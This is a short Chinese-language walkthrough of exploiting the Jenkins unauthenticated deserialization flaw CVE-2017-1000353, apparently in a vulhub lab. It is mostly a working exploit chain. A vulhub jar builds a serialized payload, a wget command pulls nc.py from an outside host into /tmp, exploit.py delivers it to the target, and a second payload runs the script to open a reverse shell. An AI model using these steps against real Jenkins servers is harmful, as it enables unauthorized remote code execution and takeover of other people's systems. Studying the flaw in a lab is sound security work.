Jenkins 命令执行漏洞(CVE-2017-1000353) by Vdeem
Jenkins 未授权远程代码执行漏洞, 允许攻击者将序列化的 Java SignedObject 对象传输给 Jenkins CLI 处理,反序列化 ObjectInputStream 作为 Command 对象,这将绕过基于黑名单的保护机制, 导致代码执行。
1 对应环境为 Jenkins 远程代码执行漏洞(CVE-2017-1000353)
2 利用工具https://github.com/vulhub/CVE-2017-1000353
3 执行命令生成字节码文件,“ ”处填可反弹 shell 文件地址
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "wget 1.1.1.1/nc.py -P /tmp"
4 发送数据包,执行命令,使文件下载到服务器
python exploit.py http://your-ip:8080 jenkins_poc.ser
5 生成字节码文件,“ ”处填写要执行的脚本
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "/bin/bash /tmp/nc.py"
6 发送数据包,执行脚本
python exploit.py http://your-ip:8080 jenkins_poc.ser
7 可反弹shell